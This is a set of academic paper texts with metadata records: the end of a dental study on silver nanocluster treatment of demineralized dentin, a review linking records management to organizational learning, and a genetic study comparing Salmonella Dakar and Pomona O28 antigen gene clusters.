The LIBS technique has been previously used in dental research to determine the presence or absence of carious or demineralized areas 18,19 and to study the presence and distribution of elements in teeth 20,21 .In this study, LIBS proved its usefulness to determine the silver signals at different depths of penetration of the treated samples.These results correspond with those obtained from the EDX analyses.The differences observed from both techniques may be attributed to the fact that EDX determines %weight per volume while LIBS measures relative molar concentrations per volume.In addition, EDX analysis is more superficial than LIBS analysis, which means that in the latter case there is also a component of the lateral diffusion of SDF or AgNCl/PMAA.However, at variance with EDX, LIBS is a relatively simple and cheaper technique that can be set-up in any research laboratory.
Regular strategies for remineralization have been based upon the use of fluoride compounds to produce hypermineralization of the lesion surface.Top-down remineralization strategies invariably require the presence of non-collagenous proteins such as phosphophoryn and dentin matrix protein that are present during the formation of dentin.Partial demineralization of mineralized collagen fibrils by bacterial acids represents a top-down approach in generating apatite seed crystallites, which differs to intrafibrillar mineralization using polymer-induced precursors.Expressed in conventional crystallization terminology, current remineralization strategies lack the mechanisms for inducing apatite nucleation and hierarchical assembly of apatites within a collagen matrix 22 .
Guided tissue remineralization (GTR) represents a promising strategy in collagen biomineralization.This mineralization strategy, that is particle-mediated and that progresses from the bottom-up, is somewhat different to what has been traditionally used in dentistry for conventional remineralization techniques.This strategy utilizes nanotechnology and biomimetic principles to achieve intra-and extrafibrillar remineralization of a collagen matrix in the absence of apatite seed crystallites 14 .This may explain why the amount of silver decreased at a depth of 100-150 μm and increased again at 150-200 μm, instead of decreasing continuously, as shown in Fig. 3.As this increase can also be observed in the penetration of silver from the SDF, it may be hypothesized that these artificial lesions presented a more affected area at a depth of 150-200 μm, where silver particles were more easily allocated.
In the attempt to achieve functional mineralization, polyanionic analogs are involved to template the functions of dentin matrix proteins in biomineralization.For that purpose, a polycarboxylic acid-based biomimetic analog is usually employed as a sequestration agent to stabilize amorphous calcium phosphate.In the present study, polymethacrylic acid functions as the polymer liquid precursor and AgNCls plays the role of calcium and phosphate ions to reproduce this particle-based assembly approach in the absence of apatite seed crystallites in the collagen matrix.
This biomimetic remineralization process represents a bottom-up approach to create nanocrystals that are small enough to fit into the gap zones between adjacent collagen molecules, and to establish a hierarchical order within the mineralized collagen.To determine whether this type of remineralization occurs using this prototype solution will require more accurate techniques and resources, which is encouraged by the results obtained in this preliminary study.
Therefore, considering the above mentioned limitations, it is possible to conclude that the use of a 20% AgNCls/PMAA solution to treat artificial caries lesions was able to restore the hardness of demineralized dentin to the hardness of undemineralized dentin and was able to penetrate to the full depth of the demineralized lesion.
optic and collimator were used to image the laser-induced plasma into the entrance slit of a Czerny-Turner monochromator (McPherson model 218, 0.3 m) equipped with a 1200 groove/mm grating.Spectral emission was detected by a PMT (Hamamatsu R636-10).
Figure 1 .
Figure 1.Preparation of the samples.
Figure 4 .
Figure 4. Intensity (328.06 nm silver atomic line) vs Penetration depths of the treated dentin measured with LIBS.
Table 1 .
Surface hardness mean values and standard deviations of the four groups.Values expressed in megapascal (MPa); Different letters express statistical differences p < 0.05.
Table 2 .
Mean (and standard deviation) %weight per volume values of silver traced at different penetration depths for AgNCls/PMAA and SDF groups.Ref.Values expressed in %weight per volume.Different letters express significant differences between groups.For each depth of penetration, significant differences between AgNCls/PMAA and SDF groups were determined by means of Student-t test and p-value indicated in the respective row (*p < 0.05).* Figure 3. Penetration of silver ions into different depths of the treated dentin measured with EDX.Vol:.(1234567890)Scientific Reports | (2023) 13:21126 | https://doi.org/10.1038/s41598-023-48519-1www.nature.com/scientificreports/
Table 3 .
Mean (and standard deviation) Intensity atomic line 328.06 nm of silver traced at different penetration depths for AgNCls/PMAA and SDF groups.No statistical differences p < 0.05 were detected among these groups. | 2023-12-02T06:17:23.403Z | 2023-11-30T00:00:00.000 | {
"year": 2023,
"sha1": "643439d2721797235dbf0d09d808ba8317598307",
"oa_license": "CCBY",
"oa_url": null,
"oa_status": null,
"pdf_src": "PubMedCentral",
"pdf_hash": "25bb2b63c4b3ed179e61229b5d353e816cffac21",
"s2fieldsofstudy": [
"Medicine",
"Materials Science"
],
"extfieldsofstudy": [
"Medicine"
]
} |
110097892 | pes2o/s2orc | v3-fos-license | Records management : a basis for organizational learning and innovation Gestão de documentos : bases para a aprendizagem e inovação organizacional
The understanding of (trans)formations related to organizational learning processes and knowledge recording can promote innovation. The objective of this study was to review the conceptual contributions of several studies regarding Organizational Learning and Records Management and to highlight the importance of knowledge records as an advanced management technique for the development and attainment of innovation. To accomplish this goal, an exploratory and multidisciplinary literature review was conducted. The results indicated that the identification and application of management models to represent knowledge is a challenge for organizations aiming to promote conditions for the creation and use of knowledge in order to transform it into organizational innovation. Organizations can create spaces and environments for local, regional, national, and global exchange with the strategic goal of generating and sharing knowledge, provided they know how to utilize Records Management mechanisms.
Introduction
Present-day society faces the challenge of accepting an extraordinarily broad diversity of cultural and ethnic groups and individuals.From this perspective, mechanistic or deterministic views are not the only ones that should be considered in the attempt to understand social phenomena (Morin, 2005a(Morin, , 2005b;;Bourdieu, 2009).Organizations are not excluded from such views and a strong information flow is continually impacting them and affecting their actions in space and time (Rousseau;Couture, 1998).
The way for organizations to differentiate themselves is related to their ability to access information and, above all, to learn, assimilate, and address innovation.This fact implies the adoption and assimilation of Records Management among individuals and organizations, as an initial Knowledge Management process to make Organizational Learning feasible and thereby promote innovation.
Therefore, it is advisable to understand recent (trans)formations and innovations with regard to the processes of Organizational Learning linked to knowledge records.These parameters can be contextualized as social, technical, and cognitive phenomena and are dependent on a form of Records Management that enables Knowledge Management to promote Organizational Learning.
However, the relationship between Organizational Learning and Records Management must first be defined.The objective of this study was to review conceptual contributions from several studies regarding Organizational Learning and Records Management as well as to highlight the importance of knowledge representation processes as a technique for advanced management to promote innovation.Rousseau and Couture (1998, p.55, our translation) emphasized that "Organizations change attitude when challenged with information and move towards recognizing informational resources"4 .Therefore, the Records Management intrinsic to Knowledge Management is justified, and performing this action in an effective manner will contribute directly to Organizational Learning and the innovative capacity of organizations/Records Management is essential for Knowledge Management as it becomes an effective way to contribute directly to Organizational Learning and the innovative capacity of organizations.
The methodological approach is multidisciplinary (involving Information Science, Archivology, Sociology, Administration, and Economics) because it involves a conceptual framework related to the phenomenon of Organizational Learning linked to knowledge records.Given the complexity of the subject, a multiple reference approach can be adopted, in which researchers provide a conceptual synthesis regarding the subject under investigation; more importantly, this approach is based on different viewpoints and reference systems that are not reducible to each other and that are made explicit by means of distinct approaches and terminologies (Fróes Burnham, 1998).Moreover, this approach can be used as part of a qualitative study for bibliographic and documental reviews, which fit the concept of basic research (Gil, 1994).
With the goal of achieving the stated objective, the present study provides a non-exhaustive review of Organizational Learning, Knowledge Management, and Records Management, and highlights the knowledge representation process as an open field for dialogue with Organizational Learning in the fields of Archivology and Information Science within the framework of these theoretical constructs.
Double-loop learning and systems thinking
Organizational Learning is understood as an ongoing process that arises from the sum of the individual learning of an organization's members but that exceeds this sum/from the sum of individual learning of group members but the sum of the group's achievements exceeds the sum of each individual's accomplishments.This process is characterized by interaction and collaboration between individuals and between working groups within social and technological systems, which work toward the development and change of organizational practices and consequently contribute to the promotion of organizational innovations (Vasconcelos;Mascarenhas, 2007;Takeuchi;Nonaka, 2008;Argyris, 2010;Senge, 2010).
According to the Organization for Economic Cooperation and Development (OECD) and the Financiadora de Estudos e Projetos (FINEP, Funding Agency for Studies and Projects) -, organizational innovations consist of the adoption and incorporation of significantly altered organizational structures, advanced management techniques, and new or substantially altered strategic orientations (Financiadora de Estudos e Projetos, 2005).
Argyris (2010) emphasized that Organizational
Learning is associated with the capacity of different parties that make up an organization to interact.This process relates to individuals when they seek to correct errors resulting from something that was carried out incorrectly.Therefore, Organizational Learning can be processed in two ways: by a single-loop or double-loop.
Single-loop learning occurs when an error is corrected, although without questioning the organizational action strategies (i.e., the variables or the values implicit in the action).Thus, learning is reflected only in the improvement of operational processes without altering the organization's guidelines.This type of learning causes the individuals to transform the action that resulted in the error, but they still operate based on the assumptions and values that underlie the action strategy.Consequently, new behaviors are not adopted (Argyris, 2010).
In double-loop learning, individuals question action strategies along with their intrinsic variables.According to Argyris (2010), this type of learning is characterized as a process in which individuals perceive and explore the possibilities of the environment by accessing new information.Later, those individuals compare the information that they have learned with the norms established for the operation of a given system.From that point, individuals adopt corrective actions in their organizational action strategies based on the questioning of normative variables of organizational action.These corrective actions result in changes in the procedures, guidelines, values, and assumptions of systems and organizational strategies (Argyris, 2010).This learning model leverages the possibilities of Organizational Innovation, and Organizational Learning results from emergent and creative strategies that promote inventions.Then, after these inventions are incorporated into the mental images and representations of individuals, which require Records Management for organizational memory, they result in innovation once they are shared.
Within this context, the learning model suggested by Argyris (2010) can be associated with the model proposed by Senge (2010).Senge believes that individuals' interactions when sharing their knowledge play a role in transforming the organization into a learning organization.Members of these organizations consider this to be a system in which everyone's work affects the work of everyone else, i.e., a system that affects and is also affected by the environment in which it operates.
The ideas of Argyris (2010) and Senge (2010) are in agreement based on the premise that organizations are not isolated systems and that they are in a continuous process of course correction.Senge (2010) correlates the learning organization itself with innovation; for such to occur, it is expected that people adopt and develop behavioral skills, which are then translated into disciplines and/or technologies.The five disciplines proposed by Senge (2010) comprise a body of theory and practice that needs to be studied, learned, and mastered to be put into action (Table 1).Although these disciplines have been proposed for the field of administration, they can also be transferred to the work practice of information professionals, insofar as they are constantly requested to participate in the process of Organizational Learning in the organization where they act and from the perspective of contemporary archival practice (Rousseau;Couture, 1998).
For Senge (2010), Organizational Learning reaches its full expression when system thinking emerges.This type of thinking refers to the fact that individuals perceive two stages: 1) the vision of the organization as an interdependent whole, contrary to the linear chains of cause and effect, and 2) the perception of the processes of change, as opposed to fragmented and isolated facts in time and space.The particular characteristic of this type of thinking resides in the effect of feedback in human actions.These actions are reinforced or balanced among each other, evidencing the responsibility of organizational individuals in the actions that they institute and establishing the development of the cognitive skill of Organizational Learning.Such skill is associated with the recording, organization, treatment, and diffusion of TransInformação, Campinas, 25(2):159-165, maio/ago., 2013 knowledge within the organization and is dependent upon the procedures and techniques that represent these factors.
Knowledge management linked to organizational learning
Organizational knowledge can be divided into tacit (or implicit) or codified (or explicit) knowledge (Polanyi, 1958).Explicit knowledge is that which is registered by means of signs (i.e., writing, drawing, images) or incorporated into tangible forms (i.e., machinery, tools), and this form of knowledge is formal and systematic.In contrast, tacit knowledge is personal and it is rooted in the action and commitment of the individual (i.e., occupation or profession), as well as in technical skills, mental models, beliefs, and perspectives (Santos, 2007;Takeuchi;Nonaka, 2008).
It is inferred that organizations depend on individuals' tacit knowledge.Therefore, tacit knowledge should be codified and registered.Records are documented and these "Govern the relationships between governments, organizations, and persons" (Rousseau;Couture, 1998, p.32, our translation) 5 .This fact provides a competitive advantage for organizations that can properly manage their knowledge.
The adoption of a Knowledge Management policy favors Organizational Learning, which can therefore be considered one of the guidelines for Knowledge Management itself.Whatever position adopted, some authors state that management is: [...] is the process that directs individuals' competences and energies and uses material resources to reach a certain objective.[...] is also a set of techniques that allow one to make rational decisions and put them into practice so that all the individual's resources are used as best as possible bearing in mind the individual's efficacy (Guinchat; Menou, 1994, p.443, our translation)6 .Thus, managing knowledge: [...] includes activities related to the acquisition, use and sharing of knowledge by the organization.This is an important part of the innovation process.Many studies about knowledge management practices have been done in recent years.They cover policies and strategies, leadership, knowledge acquisition, trainings and communications, as well as the reasons for the use of knowledge management practices and the motives that support the development of these practices (Financiadora de Estudos e Projetos, 2005, p.32, our translation, emphasis added)7 .
Shared vision
The capacity to perceive that interrelated actions make up the whole (i.e., understand that everything is interlinked and that organizations are complex systems).
The ability to clarify and deepen personal visions, focus energies, develop patience, and view reality objectively and permanently (i.e., to have an open mind to reality and life with a creative and non-reactive attitude).
Deeply ingrained ideas, assumptions, and generalizations that influence how people understand the world and their relationships (i.e., these are reflected in the principles and values of the organization).
The ability of team members to ignore their views and preconceptions to enable collective thinking; this is founded in dialogue.
The (co)creation of a vision shared by all of the members of the organization.
main types of management system.For Arantes (1998, p.88, our translation), these systems help to "Define the reason"8 of the organization; to plan, lead, organize, execute, monitor, and evaluate activities; "To establish understanding and relationships among people; to obtain information to operate and manage the enterprise, to mobilize people to perform the organizational task"9 .The management systems potentiate the transformation of information into knowledge as long as people create meaning for this information and incorporate it in their practices (Choo, 2003)."[...] the introduction of documental information, that is, of information that is recorded in a support through the aid of a preestablished code created a real revolution in the way of seeing and using information" (Rousseau;Couture, 1998, p.61, our translation)10 .
According to the definition proposed by Santos (2007, p.176, our translation), Records Management corresponds "To the set of technical procedures and operations"11 regarding "The production, process, use, assessment, and filing of a document in a current and intermediate phase, aiming at its elimination or filing"12 .Furthermore, Records Management is responsible for the monitoring and systematic assessment of "Document creation, reception, maintenance, use, and fate, including processes to capture and preserve the evidence of information about recorded activities and transactions" (Santos, 2007, p.190, our translation)13 .Within this context, Knowledge Management can be conceived as "[...] the systematic process of identifying [recording], creating, renovating, and applying the knowledge that is strategic to the life of an organization" (Santos, 2007, p.191, our translation, emphasis added)14 .
In Knowledge Management, the focus is to some extent turned toward the results of the learning process (Loermans, 2002).However, these results are tied to the efficacy of the Records Management in organizations.The Records Management makes it possible for organizations to create knowledge, disseminate it, and incorporate it into products, services, and systems, thereby promoting Organizational Learning to spur organizational innovations.
Considering the correlation between Knowledge Management and Records Management to be dependent upon Information Management.Information Management can be conceived of as a catalyzing process that is based on an organizational infrastructure (i.e., processes, people, and technological resources).The adoption of this management system (Figure 1) includes the stimulus for creating individual knowledge and learning as well as the systematic coordination of efforts at several levels, including organizational and individual, institutional and operational, and formal and informal norms with repercussions for satisfaction, wellbeing, and overall quality (Terra, 2001).The systemic praxis of information flow makes it possible for organizational leadership to minimize its communication barriers, which brings data and information to the diverse individuals within intra and inter-organizational networks (Cunha, 2012).Such praxis, which is associated with Information and Communications Technologies and procedures for representing knowledge, constitutes advanced management techniques.
It has been highlighted that Information and Communication Technologies is a strong ally in constructing a learning organization, as long as these technologies are linked to the processes for representing knowledge.In turn, these processes are focused toward the "Notational or conceptual symbolization of human knowledge"15 and bring together techniques of classification, indexing, and the set of "Informational and linguistic"16 artifacts (Cunha;Cavalcanti, 2008, p.322, our translation).
According to Vasconcelos and Mascarenhas (2007), the structuring of information flow by means of Information and Communication Technologies makes it possible to "horizontalize" the organization, thereby diminishing or eliminating intermediate levels that would have previously made the flow of organizational knowledge rigid.Such technologies make it possible to create an organizational memory that has the ability to capture, store, and recover general and specific knowledge about organizational actions and consequently favors Organizational Learning and innovation.
Information and Communications Technologies are recognized as fundamental computational supports for the management system that includes Records Management, Information Management, and builds Knowledge Management.Therefore, irrespective of computational support, the competitiveness of an organization depends on organizational sharing and memory, which is verticalized by the processes that range from Records Management to Knowledge Management.
Conclusion
The main source of productivity in the twenty--first century is the capacity of organizations to (trans)form knowledge into socioeconomic assets, thereby paving the way for competitive advantages.Organizations are not isolated systems but, instead, they are components of numerous and varied systems that are integrated and dependent upon their composite parts: the individuals.Considering that knowledge is intrinsic to individuals, with the goal of making Organizational Learning feasible, this knowledge must be represented, made clear, and shared; this notion highlights the link between Records Management and Organizational Learning and consequently promotes innovation.Furthermore, Records Management supports organizational memory, which, in turn, is one of the foundational elements of Knowledge Management.
As discussed above, Knowledge Management consists of a set of guidelines, policies, strategies, practices, and tools to promote the generation, processing, and transformation of information into knowledge.This set requires skills that promote Organizational Learning and the recording of knowledge, which are linked to effective Records Management.The organization demonstrates its collective competence and intelligence to respond to its internal and external environment through Organizational Learning.Thus, the challenge for organizations is to identify and apply management models, with the goal of promoting conditions for the creation and use of knowledge and transforming these into innovations (e.g., products, services, management, and business).Current management models presuppose systems that will assure organizational competitiveness and efficiency.Moreover, these systems frequently include the representation of individuals' tacit knowledge and the socialization of such knowledge with the goal of creating the groundwork for a critical assessment of failures and errors.
Wherever Archival Science Records Management exists, individuals find resources to correct errors and also reflect on their underlying values, principles, and guidelines.This situation establishes double-loop learning, which requires the ability to understand the organization systemically and within the socioeconomic context.This process is facilitated when data and information are organized and preserved within the scope of current archival science.Thus, it is inferred that there is a close correlation between the conduct of the archivist and the processes of Knowledge Management and Organizational Learning for creating the groundwork for innovation.
When archivists know that their work contributes directly to Knowledge Management and Organizational Learning, these individuals become a key professional in the innovation processes.With its roots in the process of knowledge representation, archival Records Management becomes an advanced management technique that contributes directly to Organizational Learning and to the ability to innovate as an organization.
Figure 1 .
Figure 1.Relationship between data, Records Management, Information Management and Knowledge Management.
Table 1 .
The five disciplines proposed by Senge. | 2019-04-13T13:12:32.349Z | 2013-07-27T00:00:00.000 | {
"year": 2013,
"sha1": "b35ac5abf831ee6f413429959600597952965174",
"oa_license": "CCBY",
"oa_url": "https://www.scielo.br/j/tinf/a/Nyhs5LLRL4R8V9BDvz77p3F/?format=pdf&lang=en",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "4b35d44a09ad7877c82875d0e8ebfd5a66b26f91",
"s2fieldsofstudy": [
"Business"
],
"extfieldsofstudy": [
"Engineering",
"Business"
]
} |
18596829 | pes2o/s2orc | v3-fos-license | The O28 Antigen Gene Clusters of Salmonella enterica subsp. enterica Serovar Dakar and Serovar Pomona Are Different
A 10 kb O-antigen gene cluster was sequenced from a Salmonella enterica subsp. enterica Dakar O28 reference strain and from two S. Pomona serogroup O28 isolates. The two S. Pomona O antigen gene clusters showed only moderate identity with the S. Dakar O28 gene cluster, suggesting that the O antigen oligosaccharides may contain one or more sugars conferring the O28 epitope but may otherwise be different. These novel findings are absolutely critical for the correct interpretation of molecular serotyping assays targeting genes within the O antigen gene clusters of these Salmonella serotypes and suggest the possibility that the O antigen gene clusters of other Salmonella serovars may also be heterogenous.
Introduction
Salmonella O serotyping utilizes antibodies specific for sugars in the lipopolysaccharide O antigen side chain to differentiate among serovars of this bacterium. Antibodies, in highly absorbed serotyping reagents, frequently recognize a very small epitope within the O antigen oligosaccharide, perhaps only one sugar or part of one sugar [1]. The O antigen of Gram-negative bacteria is a highly variable, surface-exposed component of the lipopolysaccharide which contributes a significant role to the cell surface antigenic variation of these bacteria. It consists of repeated 3-6 monosaccharide units, with the variation in O antigens due to differences in the composition of the monosaccharide units and sugar linkages. Variations among O antigens provide the structural basis for both the Salmonella Kauffmann-White [1] and Escherichia coli O antigen serotyping schemes [2]. There are currently 46 O antigens recognized in the 2541 serovars comprising Salmonella [3] and 174 types of O antigen in E. coli [4].
Serotype currently provides the baseline from which other typing methods are carried out [5,6]. Both the virulence and host range of Salmonella enterica isolates are serotype specific [7,8]; thus, accurate determination of Salmonella serotype is currently essential for human disease surveillance and outbreak detection [9] and control of the organism in the food chain [10]. Additionally, the serogroup classification as defined by the Kauffmann-White scheme often indicates genetic relatedness, indicating that serotype frequently has phylogenetic significance [11].
The complexity, cost, and time required for the traditional serotyping using custom or commercial antisera have led researchers to consider development of alternative molecular methods [12]. Consequently it is necessary to develop techniques [13] that will allow the rapid and inexpensive determination of the most common Salmonella serotypes. Such methods [14,15] can be incorporated into easy-to-use formats [8,13,16] that will be acceptable to primary laboratories. The genes required for synthesis of the O antigen in S. enterica strains are found in a cluster between the galF and gnd genes on the bacterial chromosome [17]. Protein products of the genes within these clusters can be generally divided into three groups: (i) those required for the synthesis of the sugars, (ii) those involved in the transfer and modification of the O units, and (iii) those necessary for the polymerization and transport of the O units [17]. While the sugar biosynthetic genes have been found to be quite homogeneous between S. enterica strains, the transferase/flippase and polymerization genes encoded by the wzx and wzy genes show a great deal of heterogeneity. This heterogeneity can be used as the basis for the development of novel molecular serotyping methods [16]. We
Salmonella
Isolates. Salmonella enterica subsp. enterica serotype Pomona (serotype 28 1 28 2 :y:7; NML number 07-0213) was from the strain collection of the OIE Salmonella Reference Laboratory at the Laboratory for Foodborne Zoonoses, Guelph, ON. The S. Pomona reference strain S-1467 (28 1 28 2 :y;1,7) and S. Dakar strain S-1097 (28 1 , 28 3 :a:1,6) were from the Enterics reference strain collection at the National Microbiology Laboratory (NML), Winnipeg, MB. Strain S-1467 was originally obtained from the Institut Pasteur in 1999 while S-1097 is a culture type strain obtained in 1972 from the Public Health Laboratory Service in Colindale, UK (their strain number JT 987).
Amplification of the O-Antigen Gene
Cluster. The Oantigen gene cluster between the JUMPStart sequence [18] and gnd from isolate 07-0213 was amplified by long range PCR using primers 412 and 482 [19] with an Expand Long Range dNTPack kit (Roche Diagnostics, Laval, QC, Canada) following to the methods of the manufacturer. Template DNA was prepared using the protocol of [20]. The amount of DMSO used in each PCR reaction was optimized to 5% (vol/vol). The amplification conditions were 92 • C for 2 minutes; 10 cycles of 92 • C for 10 seconds, 65 • C for 15 seconds, and 68 • C for 15 minutes; 20 cycles of 92 • C for 10 seconds, 65 • C for 15 seconds, and 68 • C for 15 minutes plus 20 seconds added to each additional cycle; and final extension at 68 • C for 7 minutes. Following PCR amplification, amplicons were visualized on 1% agarose (Invitrogen Canada, Burlington, ON, Canada) gels after staining with ethidium bromide.
Cloning of the O-Antigen Gene Cluster DNA.
Amplicons from several PCR reactions were pooled and sheared in a nebulizer (Invitrogen) for 3 minutes at 20 psi to obtain fragments between 0.5 and 4 kb. The pooled fragments were purified using Montage PCR Centrifugal Filter Devices (Millipore, Billerica, MA, USA) and cloned into the pCR4-TOPO vector using the TOPO TA Cloning kit as instructed by the manufacturer (Invitrogen). Transformants of E. coli strain DH5α were selected on Luria-Bertani agar plates containing 100 μg mL −1 ampicillin with added X-Gal-IPTG (40 μg mL −1 ; USB Corporation, Cleveland, OH, USA). DNA was isolated from positive (white) clones by the boiling technique [21].
Sequencing of the O-Antigen
Cluster DNA. The Salmonella DNA inserts were amplified in PCR reactions using the FastStart Taq DNA polymerase kit (Roche Diagnostics Laval QC Canada) with primers M13 (5 -GTAAAA-CGACGGCCAGT-3 ) and T7 (5 -GTAATACGACTCACT-ATAG-3 ) complementary to specific plasmid sequences flanking the insertion site. Amplification conditions were 94 • C for 5 minutes, 35 cycles of 94 • C for 30 seconds, 50 • C for 30 seconds, and 72 • C for 45 seconds, followed by a final extension at 72 • C for 5 minutes. Amplicons were visualized on agarose gels as above, purified by the DNA Core Facility at the National Microbiology Laboratory using the Agencourt Ampure PCR purification system (Agencourt Bioscience Corp., Beverly MA, USA), and sequenced using the M13 and T7 primers. DNA sequencing was performed by the DNA Core Facility at the National Microbiology Laboratory using Big Dye Terminator 3.1 Cycle Sequencing kits (Applied Biosystems, Foster City, CA USA) according to the manufacturer's instructions. DNA sequence data was generated using either an ABI 3100 or 3730 DNA Analyzer (Applied Biosystems). Lasergene DNASTAR software (DNASTAR Inc., Madison WI USA), Kodon (Applied Maths, Austin, TX) and Psi-BLAST (http://www.ncbi.nlm.nih.gov/blast/Blast.cgi) were used for editing, assembling, and annotation of DNA sequences.
Results
Long PCR amplification of DNA from strain S. Dakar S-1097 using JUMPstart and gnd primers produced a product of 11,386 bp ( Table 1). The S. Pomona O28 isolate 07-0213 O antigen gene cluster was 10,125 bp long and contained 11 open reading frames ( Table 2). The sequence of this region from reference strain S. Pomona isolate S-1467 was also determined and found to be identical to the 07-0213 sequence from nucleotides 50-10,010 (data not shown). All O antigen cluster ORFs had low %G + C content and significant homology to genes from several other bacteria (Tables 1 and 2, Figure 1).
The gene order of the S. Dakar O28 O antigen gene cluster was very different than that of S. Pomona O28 The wzx and wzy genes were identified on the basis of homology of the translated protein with other genes (Tables 1 and 2, Figure 1). The topology of the translated protein products of these genes was determined to ensure that it was consistent with the proposed designation. The predicted transmembrane structure of Wzx and Wzy was confirmed using the TMHMM Server v. 2.0 (http://www.cbs.dtu.dk/services/TMHMM) and the HMM-TOP (http://www.enzim.hu/hmmtop/) servers, with the wzx translation product having 12 predicted membranespanning regions and the wzy translation products having 10. Both the wzx and wzy genes of S. Dakar O28 were unique and very different from the wzx and wzy genes of S. Pomona; the proteins showed only 28% identity (Figure 1). The S. Pomona Wzx and Wzy proteins had strong identity with their homologs in E. coli 101-1 and lower identity with Wzx and Wzy from E. coli O114 (Table 2, Figure 1). In both cases there was no identity at the DNA level, indicating convergent evolution of the protein without transfer of genes between either E. coli strain and S. Pomona.
Serotyping of the Salmonella and E. coli strains was performed by bacterial agglutination assays by the Identification and Serotyping Section, National Microbiology Laboratory, using Salmonella and E. coli specific rabbit antisera. These antisera were prepared, absorbed where necessary, and subject to stringent quality control by the NML according to reference methods [1,3,24]. Salmonella O antigens were determined by slide agglutination, whereas Salmonella H antigens and E.coli O and H antigens were determined by
Discussion
The DNA sequence of the S. Dakar O antigen gene cluster is consistent with the known structure of its O antigen oligosaccharide ( Figure 2). Rhamnose is produced by the rmlA, B, C, and D gene cluster [17] and the O antigen oligosaccharide of S. Dakar contains rhamnose (Figure 2). A putative rhamnosyltransferase was also identified in the S. Dakar O antigen gene cluster (orf11 in Table 1). Though rmlB and rmlA were present in both S. Pomona and S. Dakar, they were closest in homology to proteins from different sources (compare Tables 1 and 2), suggesting that they may have been acquired from different sources. The S. Pomona O28 O antigen cluster did not contain the rmlC and rmlD genes necessary for production of rhamnose ( Figure 1, Table 2). Furthermore, none of the other genes that were present would be expected to be active in the synthesis of this 6deoxy-hexose [17]. This differential production of rhamnose must be confirmed by structural studies of the S. Pomona O antigen oligosaccharide. If true, it could contribute to the known heterogeneity of O28 antigens. Salmonella serogroup O28 was originally divided into three subfactors-O28 1 , O28 2 , and O28 3 -without structural differences being ascribed [22,25,26]. S. Dakar expresses subfactors O28 1 and O28 3 , whereas subfactors O28 1 and O28 2 are present in the LPS of S. Tel-Aviv and S. Pomona. fdtA (dTDP-6-deoxy-3,4-keto-hexulose isomerase) and fdtB (dTDP-6-deoxy-D-xylo-hex-3-ulose aminase) genes of were identified in S. Pomona and S. Dakar. A homolog of the fdtC (putative acetylase) gene was identified in S. Pomona, which and analysis suggested is a WcxM-like protein. We suggest that the gene was indeed fdtC based on two pieces of evidence: (1) a fdtC gene is present at the same location in the E. coli O114 O antigen gene cluster, and (2) fdtA, fdtB, and fdtC together comprise a functional unit [17]. A putative gene (orf12 in Table 2), also encoding a WcxM-like protein, was found in the S. Dakar O antigen gene cluster. This gene would appear to be a homolog of the fdtC gene of S. Pomona and E. coli O114. Since the S. Dakar fdtC homolog is present in the reverse orientation compared with other genes of the O antigen cluster, it has been acquired independently of these other genes. Its position at the end of the gene cluster differs markedly from the position of fdtC in S. Pomona (Figure 1).
The rmlA and rmlB genes encode the first two enzymes of the rhamnose biosynthetic pathway in Salmonella and E. coli [17,19]. Beginning with glucose-1-phosphate, these two genes produce dTDP-6-deoxy-D-xylo-4-hexulose. This intermediate can then be converted to 3-acetamido-3,6dideoxy-D-galactose by the fdtA, fdtB, and fdtC genes [17]. The fdtC gene was a homolog of wxcM genes that encode bifunctional enzymes, in which the amino terminal part of the proteins is homologous to acetyltransferases and the carboxy terminal portions are similar to isomerases responsible for isomerisation of 4-keto hexoses to 3-keto hexoses. If both activities are indeed functional in the S. Pomona FdtC protein, this protein could be responsible for the production of the Quip3NAc sugar (Figure 2; [17]) that is known to be present in the S. Dakar O28 O antigen [22] and further suggests that the sugar may be present in S. Pomona. Alternatively, S. Pomona may indeed incorporate 3-amino-3,6-dideoxy-D-galactose into its O antigen oligosaccharide. Structural determinations are required to resolve this question. E. coli O114 strain E2808 contains in its O-antigen a sugar very closely related to Quip3NAc, namely, 3,6-dideoxy-3-(N-acetyl-L-seryl)-aminoglucose [23]. The precursor of this sugar is likely the product of those genes homologous to the S. Pomona O28 genes that as we suggest may be implicated in 3-amino-3,6-dideoxy-D-galactose and/or Quip3NAc synthesis.
S. Dakar orf9 ( Table 2) putatively encodes a protein having a very low homology to members of the glycosylase 2 family that was not found in S. Pomona. This strongly suggests that the oligosaccharide produced by S. Dakar will differ from that produced by S. Pomona. The product of the fourth open reading frame (orf2.9) was also a putative glycosyltransferase [19]. Together, these proteins would likely be responsible for adding two or more of the remaining three sugars to the S. Dakar O28 O antigen oligosaccharide ( Figure 2). S. Pomona ORFs annotated here as wbuM and amsE also had strong homology with proteins belonging to the glycosyltransferase 2 family, though the specific function International Journal of Microbiology 7 of these transferases cannot be inferred from DNA sequence alone [17]. There was no significant identity at either the DNA or protein level between these glycosyltransferases of S. Dakar and S. Pomona, suggesting that the O antigen oligosaccharides of these two isolates may contain further differences.
The protein encoded by the ORF designated wbuO contained no known conserved domains, and the function of the E. coli homolog has not been determined. Two other homologs (ACK44395 and ACD75797), which contain eight transmembrane domains, are designated as O-antigen acyltransferases.
Overall, the S. Pomona O28 O antigen gene cluster showed a remarkable conservation of gene order with the O antigen gene clusters from E. coli 101-1 and E. coli O114:H32 type strain G1088 (Figure 1, [27]). No structural analysis for the E. coli 101-1 O antigen polysaccharide was found. The E. coli O114 O-antigen oligosaccharide ( Figure 2) consists of equimolar amounts of galactose, ribose, Nacetylglucosamine, and 3,6-dideoxy-3-aminoglucose [23]. This is consistent with a role for the conserved wbuM, -N, and -O genes in transfer of galactose and glucose (or N-acetylglucosamine) to the O-antigen oligosaccharide and a role for the genes unique to E. coli O114 in the transfer of ribose. Ribose would therefore not be expected to be part of the S. Pomona O28 O antigen oligosaccharide. An additional gene (wbuL) was present in the E. coli O114 strain immediately downstream of the fdtC gene but was absent in S. Pomona. The final gene in the S. Pomona O antigen cluster showed a higher homology with wbeD from E. coli O117 [28] than that with the wbuP gene from E. coli O114.
The wbuL and wbuP genes of E. coli O114 are both glycosyltransferases that have no homolog in S. Pomona O28; these two genes may alter the E. coli O antigen structure in a fashion that either does not allow it to be recognized by antiserum against the Salmonella O28 serogroup or creates an alternative immunodominant epitope. This view is supported by the low homology of the wzy gene from S. Pomona O28 with the wzy gene from E. coli O114 and by the fact that the S. Pomona wzx gene was most closely homologous to a gene from Geobacter metallireducens GS-15.
